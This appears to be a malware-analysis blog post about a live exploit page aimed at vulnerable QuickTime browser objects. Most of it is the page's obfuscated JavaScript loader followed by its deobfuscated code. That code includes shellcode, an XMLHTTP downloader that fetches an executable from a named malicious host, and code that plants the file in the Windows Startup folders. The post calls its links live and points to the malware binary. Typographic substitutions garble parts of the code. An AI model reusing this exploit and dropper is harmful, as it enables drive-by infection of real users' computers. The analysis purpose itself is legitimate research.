Here is an example of an exploit page. This will check the computer for certain vulnerable Quicktime browser objects. If one is discovered, it will exploit the object and inject the malware to the computer and execute it. We recorded a video of the website exploiting Quicktime and installing the malware on the system (at the bottom of the post). This binary is available in /pnuemo-malware/ in our repository. See the FAQ for access. As usual, proceed at your own risk because links are still live as of this post date. One thing I will mention, when you visit the site, it logs your IP address so on subsequent visits, you’ll get a 404.
This post is very long because of the code within the page, so to read everything, make sure to read more.
hxxp://inetppui.com/html/2440/f8ae8aedaf494548b681dedb37dd3d5f/
<script language=JavaScript>function f1(z0){var i,j,ff=0xff,z9=0xc,b=0×400,
r,z7=3,s=0,z8=”ss”,w=0,p=0,t=Array(63,62,58,34,3,30,47,43,40,6,0,0,0,0,0,
0,21,24,39,60,22,29,25,15,17,26,33,46,4,11,7,54,10,53,1,2,36,14,18,55,51,5,
16,0,0,0,0,27,0,61,59,8,48,37,9,0,19,13,41,31,23,20,57,44,52,28,38,42,32,50,
45,12,56,49,35);z2=z0;l=z2.length;for(j=Math.ceil(l/b);j>0;j–){r=”;for(i=
Math.min(l,b);i>0;l–,i–){z1=t[z2.charCodeAt(p++)-48];z3=z1<<s;w|=z3;
if(s){z4=0xe7^w;z5=z4&ff;z6=z5;w=w>>8;s-=2;r=r+String.fromCharCode(z6)}
else{z7=8;s=6;z8=”7″;z9=w}}y1=”document”;y2=”write”;eval(y1+”.”+y2+”(r)”)}}
y5=”f2″;y4=”f1″;y3=y4+’(“_0xTPKAO_08t9UAO_GjzhK8tFGaQhkqscUnyJ38TfUx
OcGjzhK8tF6vs3U7jN02oX57u3I7oK97OYhP3fUjtfUjuX2neSDCyT3IsXPIsXsEyhPx
Bh3Czhsx3YBaOsP2or5C7XUbvPMsvu2IoIlCvQIP8sIIyNhPsjU78jU7OYBPsPhsjT1s
8YBaOc08t9UAO_lc342FOvW1O42ATNbxtIG8tP3c3YOAO_zCtU9FOvW1OpVIvK5
boN6sJfS8T9S8tIlqz99jJmVAeU5nTYBEbvNjJ@5welIcJSsEyYXEbHIAeN_8TSsidSMj
tgXEbHIAeNhnzmD8OYMoT5kvWlMoT5kvWlMoTlN8tYPoTmhvpYPoTHNiJ5MoTk
kEJ5MoTkkaQDlwX9PjtwlqtmhEyw_8TSuqy@GiQYXoJVPcXYlAt9DwX9PjtwlCWlMv
dV9AtSV8dV9AtR98dV1EJZN8dVUAthMAyw_8TSuqyRPAtSMFphMAtYXoJVPcXYhv
JRPoT5NAphMoThlEtmMoT5NAphMoTHM8tZlwX9PjtwlqtlhEyw_8TSuqyRPAJSMFph
MAtSMFJ5kiQSMFpD0ipYXoJVPcXY_vJDMoTl4aQmlwX9PjtwlqtD_Eyw_8TSuqyRPAt
SMjJ99EpSMFJ5MAJSMfpZ0ipSMFpV_vQSMnQZM8QYXoJVPcXYN8QRDwX9PjtwlqtS
98dVI8JHNvdVD8WSSvdVV8Jk4vdVIaQVN8dV5ip@GAyw_8TSuqyR5atYXoJVPcXYN
8tRPoT9IApHMoTY2vtmMoTlkaWZMoTlNAQDMoTl4aWRDwX9PjtwlqtmlAyw_8TSu
qyRPAtSMjJ99EpSMFJ5NAtSMFQS1ipSMnQ92EpSMnQZMipYXoJVPcXYNAQ5lwX9P
jtwlqtS98dVI8JHNvdVIAtRD8dVUcpHN8dV2vJ@h8dV9EpDMvdV9cp9IAyw_8TSuq
ykkEpYXoJVPcXYN8tSPoTYIvtRPoT5_ApHMoTHGiJYDwX9PjtwlqJ9IAyw_8TSuqyS1v
pSMFphlApSMFtZl8JSMnQZl8WYXoJVPcXYNAphlwX9PjtwlqtS98dV1ipY98dV98p42
vdV2EtL5vdVSaWl4Eyw_8TSuqyRPAtSMFpHMAtSMFtm_8JSMFQ99apSMFQR9iJSMF
pHlAtSMfJRI8JSMjQl0ipYXoJVPcXYN8tRPoTY98tRPoT9IAphMoTkMEtYPoTY9vt4PoT
YIAphMoTl4EtZlwX9PjtwlqtkMAyw_8TSuqyRPAtSMjJ9PcJSMFQkhAtSMFJmMAtSMfJ
DbvQSMFQk0vJYXoJVPcXYl8JRPoTk_8WZlwX9PjtwlqtS98dV2vJDkvdV9apL9Ayw_8
TSuqym_8JYXoJVPcXYMxWVMoTHGEJHMoTRSEJ9PoT99xQZlwX9PjtwlqtS98dV1vpS
98dVDcpS1vdVI8JSV8dVUcJLD8dVDcJmGvdVIaQYV8dVVAt5_8dVDcJY98dVI8JHGv
dV1vpRVvdVDApSI8dVD8JHGvdV5ipRSEyw_8TSuqyRVcJYXoJVPcXYN8tRDwX9Pjtw
lqtkMvdV2vJDkvdV9apL9Ayw_8TSuqyZ_8JYXoJVPcXYGxWVMoTHGEJHMoTRSEJ9Po
TR9xQZlwX9PjtwlqtS98dV1vpS98dV9apDkvdV9At9IAyw_8TSuqyS1vpSMFphlApSM
FtZl8JYXoJVPcXYNxQZlwX9PjtwlqtS98dVI8tS98dVDxtYUvdV5vtSV8dV5vtSV8dV5v
tSV8dV5vtSV8dV5iQHh8dVD8pSD8dV9apYV8dV5atmMvdVDxtD0vdV5EtDkvdV9a
pYI8dV9aplhEyw_8TSuqyZbEQSMFJ@NapSMFJ5McQSMjWL9apSMFphGcQSMFtDbEJ
YXoJVPcXYh8WZMoTY2vQLPoT5bEphlwX9PjtwlwJL98dVUcJDh8dVIAp@NvdVUEQ9
P8dVDiJSV8dVUcJY2Eyw_8TSuqyl_vWSMFtRPvQSMjQ4U8pYXoJVPcXY4vWYPoT@_E
QSDwX9PjtwlwJSDvdVIAtDG8dVIvtlGvdVIvQ4UvdV2vJYIvdVD8pl_8dV5apHGvdVD
8pHGEyw_8TSuqyLVAJSMnW5hEQYXoJVPcXYhEphMoTHGvJhMoTRVEJVMoTmlvtLD
wX9PjtwlqJHGEyw_8TSuqyL9apSMFJDlvJSMFQ4DAQYXoJVPcXYN8tZMoTDlxQZMoT
DkvQDMoTYI8QlMoT9VEJ4PoT95vJ@lwX9Pjtwlqt9IvdVSapH0vdVSaQZGvdVDEtm_
8dV9vW@N8dV9vpHM8dVSaQZGvdVSvpZkvdVDvtHbvdV9EtHhvdVDEtHG8dV9vW
HNvdV9vpHh8dVDEtZhvdVVapmlvdVVaQmGvdV9Ep@N8dV9vQm0vdVVaWHMvd
V9vpH_vdV9vQHGvdVVapHNvdVVapmbvdVVapmMvdV9EQm0vdVVaWmNvdV9ap
m_vdV9apHMvdVViQHlvdV9apm4vdVViQHGvdVVvpHGvdVDEtHNvdV5aQlkEyqW
5bRPF3LUjzcrxyMVFef1CehVvQUkwBvkqT9DnyMUc3YsE3VKx3qkqT9DnyhUceD7v
QZXayHIAeNhnT@7Ey@lwWNNjJ@5wehsceIlosUVAecVf3RUFyqkqT9DnymUj3mVj
OY7PvYXayHIAeNhnTksx3IlC6sKIyqkqT9DnymUnthsEyflwWNNjJ@5weh1xTIlC7XU
bvYXayHIAeNhnTmDFTIlwvSDFTSDFyqkqT9DnyVDn3IlCzhUneEzwuUr8th5neV2Au
L383cN8zMPceclaphkiuR1vJS1vJSU8JRUvWhMapklApk_atSUAJm4at4VatVNcuYXay
HIAeNGntmDvOD4iWNNjJ@5wehSxTIlw83U_yqkqT9DnymUntIlC8YXayHIAeNhnTY
U8OYlP342FyqkqT9DnymUFem5jOYljtm5f3fVjtYXayHIAeNMATD7EyMUc3YDwXm
Unthuqyc5jtf1wehSxTMMFeMKqt9KceS2wWYXayHIAeNhnTm9jOYh7JHPAyqW1yhD
jBNXnyMUc3Ysi3YO83wPAeGknTm_auNhnTPVfXmUnthuweh1j3Muweh1xTUXayS9
jJM1otHIvXqkorNh8JhVxzGM8XNXnyhDjBNXnyMUc3Ysi3YO83wPAeGknTm_auNhn
TPVfewhnTksx3whnT@XwehUxTwhnTksx3whnTGUjXqkotHIx3GMATDbwWN7nyLI
xTL1xXS2Cyq5CT@2nyq5C343AJIzAJisczSDnXlUfQD6CymUj3mVfXmUnBPKcXmUF
QwhnT4UfXmUfe@9fXmUnBPKcXmUnzh2wWNMAT9KxXS9jQUXayI5wJ9UfJG1otUk
wBNGFe55wBN6xtcD8OfPcTN07s712Th5FvSIjTSVnTGbwWNMAT9KxXS9jQUXayI5
wJ9UfJG1otUXny@PxTVDF3NkiWN7fWIuvrq7fWvkCT@2nyq5C343AJfhjtfUxXfPn3M
2wWN7nyLIxTL1xXS2Cyq5CT@2nyq5C343AJfhjtfUxXfPn3M2wWN7nyLIxTL1xXS2C
yq5qeSUjT@rxylXayIuvrqW1yS9jJM1qyMUAywhnTYUcXY7a343AJflwXmUFem5fXm
UFJ42wWvkqT9DnycDAzxVnT@s8OcDAzPu8t@1CehVvQMkqyrDwXmUntwlwsYXw
ehUcXYlIupUFeSI83YbwWvkozR5CXcDAzxVnT@s8XNXFbNkw3YOcKmUFePrCo55j
tI_iWNzAJi3MehDj3f7P34P8OmXaycDAzxVnT@sAu85jtf1oXqkw3YOcKmUFePrwo@
2xTS1C34DP342jXqW1yNNjJ@5Cz4DFTIlqyqkqT9Dny4UjtP5jOYlwWNNjJ@5CtmUj
J@UjOYlwWNNjJ@5Ct9PfehIAehsEyYXEbNkCT@2nyq9jJ@5w3YOcKdVMJ@2xehsi3Y
O83wPAeGknTm_auNlwopVAeU5nTfhbzSKx3YbwWvkCyNGFe5uFT9DnyZVnzWDf
3LPI3Hsi3YOcKdVMJ@2xehro8f9jz@3A3PPA3h1qyWDMsTPPvpDoXqkCz4DFTI4feG
5_ecV88f9nXY0PssP28Q2Io3DoXqkCthP83lsiTm1xv@3cJ3rATGlCo3s2vYbwWIV8J
hVxzGM8XqsfWvkCyNGFe5untmUjJ@UjOcDAzxSMvLDjzlUFup5jtL28JM9P3MU8t@
VnXYhbT9DnTV5FyUXay4I8TmUjJ@UjOcDAzxSMvLDjzlUFup5jtL28JM9P3MU8t@V
nXY_23MPMeSDfepUjJ@UjTlDoXq7fJ9UfJG1otUXjrqW1yN7fJ9UfJG1otUXjrqW1yNbA
tN0Cz4DFTI7EyYbCyq5Cz4DFTIlwjElwWN7fWvkCyU9xyGGxTSsxeI7EyYbCyq5CT@
2nyq5qT9DnycDAzx9cecsi3YO83wPAeGknTm_auNlwvLDjzlUjzfSAuJ2×3SV7BmUj
tP3IJiPcJhDoXqkCthP83lsi3YOcKRVf3f4sthVbeSV8z9KA8cKxtSDnX@bwWIV8JhVxz
GM8XqsfWIuEbNkqT9DnyRrAQIlqyqkqT9DnyRr8OYlwWNNjJ@5wehUceIlCKbUP3LP
j3SrxTm5oJfUxypPxTh2A3gVnKbDwWNNjJ@5wehI8TIlojMKxyuVjt@VnKbDwWNNj
J@5weh9×3fsEybK73mPne43bQkkvWxPne45ipl_apkBotkPAyqW1yNNjJ@5wehDF3
4svs9Unzflf3VrxtG7sJh1Au@IA34383GbqXG_aQlkaQl7oQUXoQlkaQlbwWNNjJ@5o
tHDvOYzAJi3MehDj3flwXmUfeHuqyX3A8UK8tGNA3MlwXmUFQwloXqNA3@7EtfuE
yqW1yNbAtGNA3@7vOYloXq2AtGG8JVVnT9DnT97EyYbwBhDjBqU_TIG8JVVnT9Dn
TqNA3IG_TwhnTRKA3qMAT9KxXS9FQUXvrLIxTL1xXS2wBIuvrq7fWvkCyU9xXRrAQ
I7EyYbwBU9xX4VnT9DnT97EyYbwBhDjBqU_TIGcehIAehuEtfsaoHuweh9×3fuvtHIx
3GMAT@bwWIV8JhVxzGM8XqsfWIuvrqW1yNbAtGNA3@7vOYloXqUFe5unoHsaz4D
FTqNA3IG_TwhnT4VfXmUjJVuqysPA3V5o7f2cJU3xKb5_ecSAe9s8JmKbKKr8zL2c3
YXweh9×3fuvtHIx3GMAT@bwWIV8JhVxzGM8XqsfWIuEbNkozR1qtfDvOIlqyUXnT@
2fBX9jOGUAeHuEtfsaoHuwehUcewhnT9PfXY7stfPjtf5wvhIAehKbKWDf3gDjJPs8t@
KbKpUjJ@UFywhnTRKA3qMAT9KxXS9FQUXvrLIxTL1xXS2wBIuvrqW1yNbAtGNA3@
7vOYloXqUFe5unoHsaz4DFTqNA3IG_TwhnT4VfXmUjJVuqysPA3V5wvhIAehKbKW
Df3gDjJPs8JbKMdmKbK85fehIAehPA3YXweh9×3fuvtHIx3GMAT@bwWIV8JhVxzGM
8XqsfWIuEbNkozR1qtfDvOIlqyUXnT@2fBX9jOGUAeHuEtfsaoHuwehUcewhnT9PfXY
7stfPnypUjJ@UnKb5_ecSAe9s8BbK7jVUf3mUjJ@UFywhnTRKA3qMAT9KxXS9FQUXv
rLIxTL1xXS2wBIuvrqW1yNbAtGNA3@7vOYloXqUFe5unoHsaz4DFTqNA3IG_TwhnT
4VfXmUjJVuqysPA3V5ojH9jzcKbKWDf3gDjJPs8zbK78mPcJVOjzcr8tN_8Th3839Ujz
LIAywhnTRKA3qMAT9KxXS9FQUXvrLIxTL1xXS2wBIuvrqW1yNbAtGNA3@7vOYloXq
UFe5unoHsaz4DFTqNA3IG_TwhnT4VfXmUjJVuqyoI8Bfr8zmUjJPNjJM2czw3xKb32z
iPx3PIxTbKM792F3f2ceh2feYXweh9×3fuvtHIx3GMAT@bwWIV8JhVxzGM8XqsfWIu
EbNkozR1qtfDvOIlqyUXnT@2fBX9jOGUAeHuEtfsaoHuwehUcewhnT9PfXYhbT9DnT
N7stfPnKb5_ecSAe9sx39DnKbDsjpKsjjSs7TDwXmUFtMrcWS9jJM1otHDvXq7fJ9UfJ
G1otUXjrq7fWvkCyU9xXRrAQI7EyYbwBhDjBqU_TI0xt@9fWRr8OX9fXmUntmuwehI
8TwlwvhIAehso3Sr8BbKbv@3ct@I83PPAebKMsl5fehIAehDwXmUFtMrcWS9jJM1otH
DvXq7fJ9UfJG1otUXjrq7fWvkCyU9xXRrAQI7EyYbwBhDjBqU_TI0xt@9fWRr8OX9fXm
UntmuwehI8TwlwvhIAehso3Sr8BfKbKWDf3gDjJPKbKrPnTcVnT9DnTYXweh9×3fuvt
HIx3GMAT@bwWIV8JhVxzGM8XqsfWIuEbNkozR1qtfDvOIlqyUXnT@2fBX9jOGUAeH
uEtfsaoHuwehUcewhnT9PfXY7stfPnyKr8zL28J@KbKWDf3gDjJPIcebK77f2cJUIAeYX
weh9×3fuvtHIx3GMAT@bwWIV8JhVxzGM8XqsfWIuEbNkozR1qtfDvOIlqyUXnT@2f
BX9jOGUAeHuEtfsaoHuqybKb8cu8TPPA3hPxyVrxtNMszfVnTSKx3VrctSrxKbDwXm
UjJVuqypUjJ@Uj3Sr8TbKbv@3ct@I83PPxKbIsTh3cehIAehDwXmUFtMrcWS9jJM1otH
DvXq7fJ9UfJG1otUXjrq7fWvkCyU9xXRrAQI7EyYbwBhDjBqU_TI0xt@9fWRr8OX9fXm
UntmuwehI8TwlwvhIAeh5osSr8TbKbv@3ct@I83mKbKpUjJ@UjTlDwXmUFtMrcWS9j
JM1otHDvXq7fJ9UfJG1otUXjrq7fWvkCyU9xXRrAQI7EyYbwBhDjBqU_TIGxTSsxeqNA
3IG_TwlCKbUj3lDwXmUFefUcXYBotkPAyqMAT9KxXS9FQUXvrLIxTL1xXS2wBIuvrqW
1yNbAtGNA3@7vOYloXqUFe5unoHsaz4DFTqNA3IG_TwlCKbVjBmDwXmUFefUcXY
BotkPAyqMAT9KxXS9FQUXvrLIxTL1xXS2wBIuvrqW1yNbAtGNA3@7vOYloXqUFe5u
noHsaz4DFTqNA3IG_TwlCKbD78T2Mj7PIvbK_ywhnT@rxtwlquS1jtYXvtHIx3GMAT
@bwWIV8JhVxzGM8XqsfWIuEbNkozR1qtfDvOIlqyUXnT@2fBX9jOGUAeHuEtfsaoHu
qybK_v3Vs6TKs8zKbKYXwehDF34uqyfMxBSDwWS9jJM1otHDvXq7fJ9UfJG1otUXjrq
7fWvkCyU9xyGNA3@_oOYloXqUFe5uFT9DnycDAzxVnzMsi3YO83wPAeGknTm_au
YhbzSKx3f_2elK8zLIxTU3A3YbwWcDAzxVnzMrwvGPx3MP2BSV8ThPxXRrAQUXvrL
IxTL1xXS2wBhDjBq3AJi3MopVAeU5nTfM2BSVxXRrAQUXvrLIxTL1xXS2wBhDjBq9jJ
@5CTcDAzmUjOm5jJLPcWNNjJ@5w3YOAQPu8OYG8tP3c3YOAywGf3YOcehuqyfbA
3fPAe6U7s7DwXh3AJiVnTwloO4P83c3AJiDwXh3AJiVnTwlquUrA3SDn7Xs2sYXCTc
DAzmUfXYXCKY6i3YO8tLUFywGf3YOcehuqyNhx39VfeUUAywGf3YOcehuqyI4wJM
Vjz4OEywGf3YOcehuqyVlipDbEp9UvuYIvJm7CpHGipPbiQDG8um4EJ9PvJRDiQlhip
YXCTcDAzmUfXY4CyL3xtSD8JmP8OYXCTcDAzmUfXY4CKYXqtfDiXbDwdF6iuYXCT
cDAzmUfXYzAJiPcJhraKYXEyqMAT9KxXcDAz@7czUXvrLIxTL1xXS2wB@PxTVDF3N
kiWIuvrq7fW@PxTVDF3N_iWIPx3mPcB@PxTVDF3NkiWIuEbN7jtMVjtqDjthPFef5CQ
q7fWv7fWvW5tVrcJh2c3f5w3YO83wPAeGknT@_aulUFQ@bCyqO1yHIAeNGntmsEQ
ZXayHIAeNBc3YO8OfPn3MuayHIAeNhnTf38OYBc3YO8OlUFQDBqyqW1yhDjBqPAT
9KxXmUF3cuwdTDjt9Ujt8DAzSVxTGknT@lvXgbwWIV8JhVxzGM8XqsFbNbAtG_q3
cDAzUXnT@2fBS9jJM1wehrc3w4wj@P8JhPcsYO8tLUnXlUFQ@6qyYbwdUXvrLIxTL1
xXS2wBIsFbNbAtG_q3cDAzUXnT@2fBS9jJM1wehrc3w4wj@P8JhPcsYO8tLUnXlUFQ
@6qyY6qyYbwdUXvrLIxTL1xXS2wBIsFbNbAtG_q3cDAzUXnT@2fBS9jJM1wehrc3w4
w8SUfsYO8tLUnXYlCulUFQ@bwdUXvrLIxTL1xXS2wBIsFbNbAtG_q3cDAzUXnT@2fB
S9jJM1wehrc3w4w8SUfsYO8tLUnXlUFQ@6qyYbwdUXvrLIxTL1xXS2wBIsFbNbAtG_
q3cDAzUXnT@2fBS9jJM1wehrc3w4w8SUfsYO8tLUnXlUFQ@bwdUXvrLIxTL1xXS2w
BIsFbNljthPFef1q3cDAzUXEbIO5bvW5T9DnyhUceI_ipqkqT9DnyUsaQqkqT9Dnym
UfJYIvOY7CQlkaQPkaQlkvuT5aQl7CQlkaQlkaQlkaQhNEyqkqT9DnymUjQPsEyD7q
yqkqT9DnymUj3D7EyP_EyqW5T9DnyGrcJksE3SSnyrDFe92nXYl285NijVMEpPNvprV
EywhnTPIiXY_a8l7oWkhvjPkaQT5apJVIQ5MPQHlCuY_Ij5lPj3U28PMPjZMsuh4v8YX
wehIv3wloWmlEQPG2prDvQlNvQZ_vQHlCuYkaQlNE8lhiQYXwehVAJD6qylkaQHN2
Qm_IywhnTLD8QMlqp3VEQl4aQrswpHNa8PGv839vuk4vWTsC8TIE8r2vQzDE8TVE
yMlqph_apV_EQesqj54aWPGvpDGsur5a8k7q8T928JViQ31iQmhIyMlwpJPEjZNIpm7
q8lNE8PGiQmlwXmUjQPuqyk_IQH7wQmbv8lhijl_s8mGIyMlCQH4EQmM2Q57q8hh
IQPGiQL1vukhvpk7CQ5NPjzIa8e5ipHNEyMlqpmbE8ZlvpJDwXmUj3DXqyeDa8PGaW
mlwXmUjQPuqyr2E8zsCWZGaWh4EpklaQDkEyMlqjr5vQkMvW5lwXmUj3DXqyzDPQ
PGapR2vukhEjh7CpH_apVGijkGEjJ1EyMlC8lh2QZGspH7wpT9vWPGiQJDwXmUjQPu
qyeUvjl7qQVNsprIvQJIIjDbEyMlo8khPjTU28JswjrDaWPGvWHl8ue5vpl7qpT5ipT2Ep
@GipHlIyMB8TMK8XqW5T9DnymUf3YsEycDAzSVxTYXayHIAeNhnTUU8OYbxtYXay
HIAeNhnT@U8OYzAJi3_vzV_yqkqT9DnyUPjTP5jOfPn3MuEbZ18zMPxyG0A3L1f6Us
7XNXFbNb8TVsxeIB8TMKcWUPjTP5jO43cJVs8tfUFuLDjt9Ujt3K8tPPA3h1weh3AJUX
vzVPj3lrweSUjjhUFeUD8ThPxXmUjz4KwehDntwb8Xqb8TVsxefhjthI2ThDjzYPnTS1q
yLK8JmVFywhnTUUxuYhx3mDwXmUjz4uqyElwXGrcJku7z22wWvkozR1ozVPj3l2wB
hDjBq2AtG6ce@rxXUPjTP5jXUXFJ@P8Jwuvrq7fJ9UfJG1otUXjrq7fWvkozwXwWv7Fbv
W5bvNjJ@5weGVjOVr8tmV8JlPxXm1ceY2wWvNjJ@5q3c5n3SrxyIkCQkUaQlkaQl7C
Xm1cef68tfSxTGOqQwkaBm0vXqW5T9Dnyf3xemUv3IMF3SVfJ95jtGlodV2aQ5kEyU
XayZ18zMPxyGBc3lVnpPrC3Srcth1AX@6E3c5n3Sr8XNBc3lVnpPuoOf3xemUv3qkq3
c5feh78Of3xemUv3fhjTYVnT@2A3g1CQMBc3lK8tf3qQUXEb9DFeD0aWPsE3SSnyrD
Fe92nXUXayR3AeGb8OlXvz_GipqbcXwbwB9DFeD0aWPu7z2sE3c5feh7cXm1ceq7fW
vW5bvW5T9Dnyh3AJiVnT@7ielIcJSuET9DnyGIATSInTIN8JMVjtqNjJ@5wJGu8ehsidN
6ieLSwXgljzlUnyMIA3gPjJgP8OYN_jgXwdmVAeU5nTYBaybrxy8rxy3DFecDnyQPceV
s8tNBstkUnybrxypPxTNGnzS3IJiPcJhsij@P8JhPcsYO8tLUnXY_7TUVczX283SV2zSVc
z8DAzSVxTf_7TUVczX283SV2zSVczf_EyUkCKf5wsf5o8@Df3@5wtcUf3NkaybrxyK
9xyKVfsYO8tLUnXh18t8DAzSVxTUkCoGPA3N6_3NbItNGnzS3IJiPcJhro7mI7TUVcz
X283SIIT92×39Dx3S1CQUkCoGPA3N6MdvPfeh5wJGPcJw5qtcDnyR2×3SKMdN6_3N
08JHP8ehsvQN6_3NMI345o7R5CKf5o8fUxyK9xybrxy_zweLDfdNXCygbxehraybrcd
qW5T9DnycDAzD7czIlCtcV8TPPA3hrqywGf3YOcehDiXY4FeUUjtMrAywGf3YOcehD
iXY0wJGu8eh2wWYXvtHIx3GzAJiIv3w2wWvbAtN0Cz99jtDUjXNXnyHIAeNzAJiDv3w
sEy43cJVs8tfUFuYXCTcDAzmUFQwlwT@2xTSDwXh3AJiVnT@XqyG4COYXCTcDAz
mUFQwlw3YO8tLUFywGf3YOcehDiXYkwj7IPvp228YXCTcDAzmUFQwloObDwJMVjz
4OEywGf3YOcehDiXYkEQe9IQVGspP0ijD4EywGf3YOcehDiXY7CpeDiQPlPjkkvuYXC
TcDAzmUFQwlC8mGaWk_IjzUPjHl2KYkwTUUxTGsaKY_aQl6_yN08tUSxzhsaKYhaQ
bDCymUjBMP8ObDqJcDntSDFWlknBbDqO_kjJ@I83NB8JPP8ObDwe@VxKYkqT9K8T
SsaKY_FywGf3YOcehDiXYGFuP3ATbDqO_kjJ@I83NB8JPP8ObDoJVUf3YXCTcDAzmU
FQwlCeMI8BbDCyHIx3VP8ObDCT@PjtbDqO_kjJ@I83NB8JPP8ObDC3c3xebDCyHIx
3VP8ObDqt9KceSK_yF6ae9DjJP5q39s8tI6_yL3A3hDf3MK8t@K_yNNjJMPjtI6_yhDjT
SK_yF6iuYXCTcDAzmUFQwlw3YO8tLUFOgbwWYXayS9jJM1w3YOAQPu8Xq7fWvW5
bvkCyv6iupVIvK5boFW5b_h8tfUjt@raOGIEOhkapNBP3h5q8cPF34KiuGIEO_zwJSrxT
SDFO_0AeF6iJSrxTSDFOfS8zf1fulBqpfhvQ_zwJSrxTSDFO_zqJcU8BF6iuGUj3MrEb”)’;
y6=”()”;eval(y3);</script>
THIS DEOBFUSCATES TO THE FOLLOWING:
if (haveqt) { var obj2mk=”document.”+tobjst2+”write”+tobjst2+”(‘<”+tobjst2+
“object”+tobjst2+” CLASSID”+tobjst2+”=\”clsid:”+tobjst2+”02BF25D5-8C17″
+tobjst2+”-4B23-BC80-”+tobjst2+”D3488ABDDC6B\” width=\”100\” height=\”30\”
style=\”border:0px\”><param name=\”src\” value=\”q”+tobjst2+”t.mov\”>
<param name=\”auto”+tobjst2+”play\” value=\”true\”><param name=\”loop\”
value=\”false\”><param name=\”controller\” value=\”true\”></”+tobjst2+
“object>’);”; eval(obj2mk);};</SCRIPT>
<SCRIPT Language=”javascript”>
var space=”";
var aue=’%ue’;
var shsb=”%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001″+aue+”f33″+aue+
“243″+aue+”bfa”+aue+”805%uffec%uffff%u8b7f%udf4e”+aue+”fef%u64ef”+aue+
“3af%u9f64%u42f3%u9f64%u6ee7″+aue+”f03″+aue+”feb%u64ef%ub903%u6187″+
aue+”1a1%u0703″+aue+”f11″+aue+”fef%uaa66%ub9eb%u7787%u6511%u07e1″+
aue+”f1f”+aue+”fef%uaa66%ub9e7%uca87%u105f%u072d”+aue+”f0d”+aue+”fef
%uaa66%ub9e3%u0087%u0f21%u078f”+aue+”f3b”+aue+”fef%uaa66%ub9ff%u2e87
%u0a96%u0757″+aue+”f29″+aue+”fef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa”
+aue+”806″+aue+”fee%ub1ef%u9a66%u64cb”+aue+”baa”+aue+”e85%u64b6%uf7ba
%u07b9″+aue+”f64″+aue+”fef%u87bf%uf5d9%u9fc0%u7807″+aue+”fef%u66ef%uf3aa
%u2a64%u2f6c%u66bf%ucfaa%u1087″+aue+”fef%ubfef%uaa64%u85fb%ub6ed%uba64
%u07f7″+aue+”f8e”+aue+”fef%uaaec%u28cf%ub3ef%uc191%u288a”+aue+”baf%u8a97″
+aue+”fef%u9a10%u64cf”+aue+”3aa”+aue+”e85%u64b6%uf7ba%uaf07″+aue+
“fef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3
%ub6ea%uba64%u07f7″+aue+”fcc”+aue+”fef”+aue+”f85%u9a10%u64cf”+aue+
“7aa”+aue+”d85%u64b6%uf7ba%uff07″+aue+”fef%u85ef%u6410%uffaa”+aue+
“e85%u64b6%uf7ba”+aue+”f07″+aue+”fef%uaeef%ubdb4%u0eec%u0eec%u0eec
%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403″+aue+”792
%ub264%ub9e3%u9c64%u64d3%uf19b”+aue+”c97%ub91c%u9964″+aue+”ccf%udc1c
%ua626%u42ae%u2cec%udcb9″+aue+”019%uff51%u1dd5″+aue+”79b%u212e”+
aue+”ce2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564″+aue+”ccb%u8932″+
aue+”364%u64a4%uf3b5%u32ec”+aue+”b64″+aue+”c64%ub12a%u2db2″+aue+
“fe7%u1b07%u1011%uba10%ua3bd%ua0a2″+aue+”fa1%u7468%u7074%u2f3a%u692f
%u656e%u7074%u7570%u2e69%u6f63%u2f6d%u6966%u656c%u2f73%u3432%u3034
%u662f%u6138%u3865%u6561%u6164%u3466%u3439%u3435%u6238%u3836
%u6431%u6465%u3362%u6437%u3364%u3564%u2f66%u0000″;
function lsrn(pt31) { var ldob=null; var tds1=17; var st2=”2″; var stms=”Microsoft”;
var stmss=”MS”; var stxml=”XML”; var stdt=”.”; var stht=”HTTP”; var stsrv=”Server”; var url=”http://inetppui.com/files/2440/f8ae8aedaf494548b681dedb37dd3d5f/”;
var tds2=17; var stgt=”GET”; var std=”D”; var stbd=”Body”; var strsp=”response”;
var ev1=”ldob”+stdt+”open(stgt,url,false);”; var stsv=”Save”; try { ldob=objmker
(pt31, stms+stdt+stxml+stht); eval(ev1); } catch(e) { try { ldob=objmker(pt31,
stmss+stxml+st2+stdt+stxml+stht); eval(ev1); } catch(e) { try { ldob=objmker(pt31,
stmss+stxml+st2+stdt+stsrv+stxml+stht); eval(ev1); } catch(e) { try
{ ldob=new XMLHttpRequest(); eval(ev1); } catch(e){ return 0; };};};};
try { ldob.send(null); } catch(e) { try { ldob.send(null); } catch(e) { return 0;
};};
eval(“ld”+stbd+”=ldob.”+strsp+stbd);
var obj_strm=objmker(pt31, “A”+std+”O”+std+”B.Stream”);
if (obj_strm) {
obj_strm.Type=1; obj_strm.Mode=3; obj_strm.Open(); obj_strm.Write(ldBody);
var hdrv=”"; var dtemp=”"; var dstart=”"; var daustart=”";
try {var obj_WScript=objmker(pt31, “WScript.Shell”);
try{var wshProcEnv=obj_WScript.Environment(“PROCESS”); hdrv=wshProcEnv(“HOMEDRIVE”);
dtemp=wshProcEnv(“TEMP”);}catch(e){};
try{dstart=obj_WScript.SpecialFolders(“Startup”); daustart=obj_WScript.SpecialFolders(“AllUsersStartup”);
}catch(e){}; }catch(e){};
if (hdrv==”") { hdrv=”C:”; };
if (dtemp==”") { try { var obj_fso=objmker(pt31, “Scripting.FileSystemObject”);
dtemp=obj_fso.GetSpecialFolder(2);}catch(e){};};
var fn2=”"; var fn=”"; var stds=”\\Documents and Settings\\”; var stau=”All Users\\”; var
stfln=”\\msupd_0809_upd070148.exe”;
var strnd=Math.round(Math.random()*(100000-1)+10000); var ev2=”obj_strm.”+stsv+”ToFile(fn,
“+st2+”);fn2=fn;”; if(fn2==”"){if(daustart!=”"){try{Tv=daustart;fn=Tv+stfln;eval(ev2);}catch(e){};};};
if(fn2==”"){if(dstart!=”"){try{Tv=dstart;fn=Tv+stfln;eval(ev2);}catch(e){};};};
if(fn2==”"){try{Tv=hdrv;fn=Tv+stds+stau+”Menu Inicio\\Programas\\Inicio”+stfln;eval(ev2);}catch(e){};};
if(fn2==”"){try{Tv=hdrv;fn=Tv+stds+stau+”Menuen Start\\Programmer\\Start”+stfln;eval(ev2);}catch(e){};};
